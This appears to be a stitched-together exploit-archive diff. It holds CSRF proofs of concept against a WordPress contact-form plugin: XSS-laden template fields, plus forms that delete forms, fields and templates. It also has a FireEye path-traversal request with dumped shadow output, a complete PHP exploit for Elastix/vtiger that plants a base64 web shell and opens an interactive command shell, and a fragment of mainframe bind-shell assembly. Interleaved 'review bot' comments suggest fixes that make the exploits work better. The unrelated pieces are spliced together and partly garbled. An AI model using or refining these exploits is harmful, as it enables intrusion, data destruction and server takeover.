<input type="hidden" name="styles&#91;135&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;136&#93;" value="solid" />
<input type="hidden" name="styles&#91;137&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;138&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;139&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;140&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;141&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;142&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;143&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;144&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;145&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;146&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;147&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;148&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;149&#93;" value="normal" />
<input type="hidden" name="styles&#91;150&#93;" value="normal" />
<input type="hidden" name="styles&#91;151&#93;" value="none" />
<input type="hidden" name="styles&#91;152&#93;" value="inherit" />
<input type="hidden" name="styles&#91;153&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;154&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;155&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;156&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;157&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;158&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;159&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;160&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;161&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;162&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;163&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;164&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;165&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;166&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;167&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;513&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;176&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;177&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;178&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;179&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;180&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;181&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;182&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;183&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;184&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;185&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;186&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;187&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;188&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;189&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;171&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;514&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;172&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;173&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;174&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;175&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;169&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;521&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;522&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;170&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;523&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;535&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;536&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;537&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;538&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;539&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;540&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;541&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;542&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;543&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;544&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;545&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;546&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;547&#93;" value="solid" />
<input type="hidden" name="styles&#91;548&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;549&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;550&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;551&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;524&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;525&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;526&#93;" value="normal" />
<input type="hidden" name="styles&#91;527&#93;" value="normal" />
<input type="hidden" name="styles&#91;528&#93;" value="none" />
<input type="hidden" name="styles&#91;529&#93;" value="inherit" />
<input type="hidden" name="styles&#91;530&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;531&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;532&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;533&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;534&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;91&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;50&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;212&#93;" value="left" />
<input type="hidden" name="styles&#91;92&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;93&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;209&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;100&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;101&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;127&#93;" value="solid" />
<input type="hidden" name="styles&#91;102&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;103&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;104&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;105&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;94&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;95&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;96&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;97&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;98&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;99&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;106&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;107&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;108&#93;" value="normal" />
<input type="hidden" name="styles&#91;109&#93;" value="normal" />
<input type="hidden" name="styles&#91;110&#93;" value="none" />
<input type="hidden" name="styles&#91;112&#93;" value="inherit" />
<input type="hidden" name="styles&#91;515&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;113&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;114&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;115&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;116&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;51&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;52&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;124&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;516&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;125&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;126&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;117&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;118&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;119&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;120&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;121&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;122&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;552&#93;" value="1" />
<input type="hidden" name="styles&#91;553&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;554&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;555&#93;" value="normal" />
<input type="hidden" name="styles&#91;556&#93;" value="normal" />
<input type="hidden" name="styles&#91;596&#93;" value="none" />
<input type="hidden" name="styles&#91;590&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;591&#93;" value="solid" />
<input type="hidden" name="styles&#91;592&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;558&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;559&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;560&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;561&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;563&#93;" value="1" />
<input type="hidden" name="styles&#91;562&#93;" value="1" />
<input type="hidden" name="styles&#91;597&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;598&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;564&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;565&#93;" value="normal" />
<input type="hidden" name="styles&#91;566&#93;" value="normal" />
<input type="hidden" name="styles&#91;594&#93;" value="none" />
<input type="hidden" name="styles&#91;567&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;568&#93;" value="solid" />
<input type="hidden" name="styles&#91;569&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;570&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;571&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;572&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;573&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;574&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;595&#93;" value="none" />
<input type="hidden" name="styles&#91;575&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;576&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;577&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;578&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;579&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;580&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;581&#93;" value="normal" />
<input type="hidden" name="styles&#91;582&#93;" value="normal" />
<input type="hidden" name="styles&#91;593&#93;" value="none" />
<input type="hidden" name="styles&#91;583&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;584&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;585&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;586&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;599&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;628&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="2" /> <!-- template id to edit -->
<input type="submit" value="Click me for update template" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (delete) Cross-site Request Forgery (CSRF) issues
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
==============
Description
==============
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin,
making the victim administrator user deletes a form (PoC # 1), delete a form element (PoC # 2), or delete an existing template (PoC # 3).
-->
<!--
===============================
delete a form [CSRF PoC #1]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms" method="POST">
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- form id value.. -->
<input type="hidden" name="ids&#91;&#93;" value="2" />
<!-- end -->
<input type="hidden" name="task" value="delete" />
<input type="submit" value="Delete form(s)" />
</form>
</body>
<!--
===============================
delete a field [CSRF PoC #2]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_fields" method="POST">
<input type="hidden" name="filter&#95;form" value="3" />
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;type" value="0" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- fields ids to delete -->
<input type="hidden" name="ids&#91;&#93;" value="9" />
<input type="hidden" name="ids&#91;&#93;" value="10" />
<!-- end list -->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids&#91;&#93;" value="" />
<input type="submit" value="delete field(s)" />
</form>
</body>
<!--
==================================
delete a template [CSRF PoC #3]
==================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_templates" method="POST">
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- an existing template id(s) to delete -->
<input type="hidden" name="ids&#91;&#93;" value="1" />
<!--end-->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids&#91;&#93;" value="" />
<input type="submit" value="Delete template(s)" />
</form>
</body>
<!---
===========
TIME-LINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
->
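Review bot: the comment around the TIME-LINE block at the end of the file is closed with `->` instead of `-->`, so the comment opened by `<!---` never terminates and the `<html>` opened at the top of this file has no matching `</html>`; write `-->` and close the document with `</html>` as the first PoC file does. Two smaller points: the delete-field and delete-template forms carry a second, empty `ids[]` input after `task=delete` that is redundant and should be dropped, and the TECHNICAL DETAILS paragraph says the issue is exploited by "sending a special link" while all three PoCs are POST forms that an already logged-in administrator has to submit, so the write-up should state that precondition (an authenticated admin session in the same browser) rather than imply a plain GET link.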

platforms/php/webapps/38090.txt Executable file

@ -0,0 +1,52 @@
Just one of many handfuls of FireEye / Mandiant 0day. Been sitting on this for more than 18 months with no fix from those security "experts" at FireEye. Pretty sure Mandiant staff coded this and other bugs into the products. Even more sad, FireEye has no external security researcher reporting process.
FireEye appliance, unauthorized remote root file system access. Oh cool, web server runs as root! Now that's excellent security from a _security_ vendor :) Why would you trust these people to have this device on your network?!?!?
https://fireeyeapp/script/NEI_ModuleDispatch.php?module=NEI_AdvancedConfig&function=HapiGetFileContents&name=../../../../../../../../../../../etc/passwd&extension=&category=operating%20system%20logs&mode=download&time=...&mytoken=...
...
root:aaaaa:16209:0:99999:7:::
bin:*:15628:0:99999:7:::
daemon:*:15628:0:99999:7:::
adm:*:15628:0:99999:7:::
lp:*:15628:0:99999:7:::
sync:*:15628:0:99999:7:::
shutdown:*:15628:0:99999:7:::
halt:*:15628:0:99999:7:::
mail:*:15628:0:99999:7:::
uucp:*:15628:0:99999:7:::
operator:*:15628:0:99999:7:::
games:*:15628:0:99999:7:::
gopher:*:15628:0:99999:7:::
ftp:*:15628:0:99999:7:::
nobody:*:15628:0:99999:7:::
vcsa:!!:16209::::::
rpc:!!:16209:0:99999:7:::
saslauth:!!:16209::::::
postfix:!!:16209::::::
rpcuser:!!:16209::::::
nfsnobody:!!:16209::::::
apache:!!:16209::::::
ntp:!!:16209::::::
lighttpd:!!:16209::::::
sshd:!!:16209::::::
mailnull:!!:16209::::::
smmsp:!!:16209::::::
openvpn:!!:16209::::::
tcpdump:!!:16209::::::
applianceuser:<redacted>:16209:0:99999:7:::
rproxy:aaaaa:16209:0:99999:7:::
sfserver:aaaaa:16209:0:99999:7:::
provisioning:aaaaa:16209:0:99999:7:::
upgrayedd:aaaaa:16209:0:99999:7:::
sftasker:aaaaa:16209:0:99999:7:::
felistener:aaaaa:16209:0:99999:7:::
lighthouse:aaaaa:16209:0:99999:7:::
crlfactory:aaaaa:16209:0:99999:7:::
panlistener:aaaaa:16209:0:99999:7:::
fireeye:<redacted>:16209:0:99999:7:::
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
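Review bot: the output pasted under the request does not match the path the request asks for: `name=../../../../../../../../../../../etc/passwd` targets the seven-field passwd file, but every line shown (`root:aaaaa:16209:0:99999:7:::`) has the nine-field shadow layout (user, hash, last change, min, max, warn, inactive, expire, flag), so either the path in the URL or the paste is wrong and the write-up should say which file was actually read. The request also elides `time=...` and `mytoken=...` without saying whether `mytoken` must be a valid session token; if it must, the title claim of "unauthorized" access needs qualifying as authenticated traversal. Finally, the advisory names no affected product line, firmware version or mitigation, which the header of an Exploit-DB entry normally carries; add at least the version tested.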

platforms/php/webapps/38091.php Executable file

@ -0,0 +1,95 @@
<?
echo "\n+-------------------------------------------+\n";
echo "| Elastix <= 2.4 |\n";
echo "| PHP Code Injection Exploit |\n";
echo "| By i-Hmx |\n";
echo "| sec4ever.com |\n";
echo "| n0p1337@gmail.com |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target [https://ip] # ";
$target=trim(fgets(STDIN));
$inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo="));
?>';
$faf=fopen("fa.txt","w+");
fwrite($faf,$inj);
fclose($faf);
$myf='fa.txt';
$url =
$target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00";
// URL
$reffer = "http://1337s.cc/index.php";
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4)
Gecko/20030624 Netscape/7.1 (ax)";
$cookie_file_path = "/";
echo "| Injecting 1st payload\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, $reffer);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
curl_close($ch);
//echo $result;
echo "| Injecting 2nd payload\n";
function faget($url,$post){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
$me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00","");
echo "| Testing total payload\n";
$total=faget($target."/vtigercrm/farsawy.php","pwd=1337");
if(!eregi("Faris on the mic :D",$total))
{
die("[+] Exploitation Failed\n");
}
echo "| Sending CMD test package\n";
$cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
if(!eregi("farsawy",$cmd))
{
echo " + Cmd couldn't executed but we can evaluate php code\n + use :
$target//vtigercrm/fa.php\n Post : fa=base64code\n";
}
echo "| sec4ever shell online ;)\n\n";
$host=str_replace('https://','',$target);
while(1){
echo "i-Hmx@$host# ";
$c=trim(fgets(STDIN));
if($c=='exit'){die("[+] Terminating\n");}
$payload=base64_encode("passthru('$c');");
$fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload");
$done=kastr($fuck,"-----------------","-----------------");
echo "$done\n";
}
/*
I dont even remember when i exploited this shit!
maybe on 2013?!
whatever , Hope its not sold as 0day in the near future xDD
*/
?>
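Review bot: the fallback message printed when the command test fails tells the user to post to `$target//vtigercrm/fa.php`, but the page the first payload writes and every later request uses is `/vtigercrm/farsawy.php` (and the double slash is a typo); fix the path so the message is usable. Portability: `eregi()` (used in both response checks) was deprecated in PHP 5.3 and removed in PHP 7, and the `<?` short tags at the top of the script and inside `$inj` depend on `short_open_tag`, so the header should record the PHP version this was tested with. `$cookie_file_path = "/"` names a directory, so `CURLOPT_COOKIEFILE`/`CURLOPT_COOKIEJAR` never persist anything; either drop the two options or point them at a writable file. The result of the `$me=faget(...)` request for `cache/import/IMPORT_` is never checked or used, and the base64 payload in `$inj` is undocumented; a comment stating what that request does and that the payload drops `farsawy.php` into the vtigercrm directory would help both readers and responders looking for the artifact.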


@ -1,584 +1,158 @@
TITLE 'bind shell for mainframe/system Z' TITLE 'sb_shellcode.s x
BINDSH CSECT Author: Bigendian Smalls'
BINDSH AMODE 31 ACONTROL AFPR
BINDSH RMODE ANY SBSHELL CSECT
*********************************************************************** SBSHELL AMODE 31
* * SBSHELL RMODE ANY
* @SETUP registers and save areas * SYSSTATE ARCHLVL=2
* * ENTRY MAIN
*********************************************************************** MAIN DS 0F
@SETUP DS 0F # full word boundary ** Begin setup and stack management **
STM 14,12,12(13) # save our registers STM 6,4,12(13) # store all the registers in old SP area
LARL 15,@SETUP # base address into R15 LARL 15,*-4 # put base addr into R15
LR 8,15 # copy R15 to R8 LR 12,15 # put given base addr into R12
USING @SETUP,8 # R8 for addressability throughout XR 1,1 # zeroout R1 for counting
LARL 11,SAVEAREA # sa address XR 2,2 # zeroout R1 for counting
ST 13,4(,11) # save callers save area XR 3,3 # zeroout R3
LR 13,11 # R13 to our save area AFI 1,X'01010102' # loading a 1 in R1
DS 0H # halfword boundaries AFI 2,X'01010103' # loading a 1 in R1
XR 1,2 # loading a 1 in R1
*********************************************************************** LR 4,1 # will put a 4 in R4
* * SLA 4,1(1) # make R1 == 4
* @LOADFS - load all the functions we need * XR 10,10 # zeroout R10 for our egg
* for SC loop this * XR 2,2 # zero 2
* * LGFI 10,X'deadbeef' # load egghunter value into R10
*********************************************************************** LR 11,12 # load base int R11
@LOADFS L 2,FFUNC # first function we use LOOPER AR 11,1 # add 1 to R11
